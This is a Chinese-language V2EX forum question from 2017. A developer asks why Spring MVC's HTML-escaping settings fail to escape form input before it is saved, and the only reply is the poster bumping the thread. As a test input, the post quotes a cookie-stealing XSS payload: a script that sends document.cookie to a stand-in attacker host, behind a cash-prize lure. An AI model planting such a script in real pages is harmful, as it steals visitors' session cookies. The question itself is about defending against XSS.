V2EX = way to explore
V2EX 是一个关于分享和探索的地方
现在注册
已注册用户请  登录
V2EX 提问指南
kenduffy
V2EX  ›  问与答

SpringMVC: HtmlEscape 设置没起作用怎么回事?

  •  
  •   kenduffy · 2017-11-28 21:25:52 +08:00 · 2671 次点击
    这是一个创建于 2552 天前的主题,其中的信息可能已经有所发展或是发生改变。

    项目用的是 SpringMVC+jsp

    想要对提交表格的内容进行字符转义防止 XSS 攻击

    根据 http://www.codeweblog.com/spring-mvc-%E5%AE%89%E5%85%A8/

    做处理,下面三条都做了

    1)web.xml 中添加

         <context-param>     <param-name>defaultHtmlEscape</param-name>      <param-value>true</param-value> </context-param>
    

    2)在包含 form 的 jsp 页面中添加

    <spring:htmlEscape defaultHtmlEscape="true" />
    

    3 )直接在 form 中的元素中添加

    <form:input path="someFormField" htmlEscape="true" />或<form:form htmlEscape="true">
    

    然后在表格上添加

    点击就送百元现金

    <script>document.getElementById('attacker').href='http://www.attacker_741.com/receiveCookies.html?'+document.cookie;</script>

    发现存进数据库的没有转移,依然是原文

    怎么回事啊?

    1 条回复    2017-11-28 21:51:45 +08:00
    kenduffy
        1
    kenduffy  
    OP
       2017-11-28 21:51:45 +08:00
    顶顶顶
    关于   ·   帮助文档   ·   博客   ·   API   ·   FAQ   ·   实用小工具   ·   1017 人在线   最高记录 6679   ·     Select Language
    创意工作者们的社区
    World is powered by solitude
    VERSION: 3.9.8.5 · 30ms · UTC 19:36 · PVG 03:36 · LAX 11:36 · JFK 14:36
    Developed with CodeLauncher
    ♥ Do have faith in what you're doing.